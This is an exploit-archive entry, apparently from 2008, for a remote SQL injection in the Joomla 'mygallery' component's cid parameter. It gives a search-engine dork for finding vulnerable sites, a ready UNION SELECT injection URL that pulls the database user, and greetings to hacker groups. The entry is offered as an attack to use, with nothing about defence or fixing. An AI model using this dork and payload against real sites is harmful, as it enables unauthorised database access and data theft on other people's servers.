id: 3342
date: 06/30/2008
title: Joomla Component mygallery (cid) Remote SQL Injection Vulnerability
author: Houssamix
cves: 

===================================================================
Joomla Component mygallery (cid) Remote SQL Injection Vulnerability
===================================================================



               H-T Team { HouSSamix & ToXiC350 }
=====================================================================
     Joomla Component mygallery Remote SQL Injection Exploit
=====================================================================

## AUTHOR :  HouSSamix From H-T TeaM

## Script :  mygallery Joomla Component ( version unknown )

## DorKs :  inurl:index.php?option=com_mygallery "cid"
			
## EXPLOIT :

index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--

## Note : the number of columns can be diffrent .

## GREETZ  :  CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers




#  0day.today [2023-03-23]  #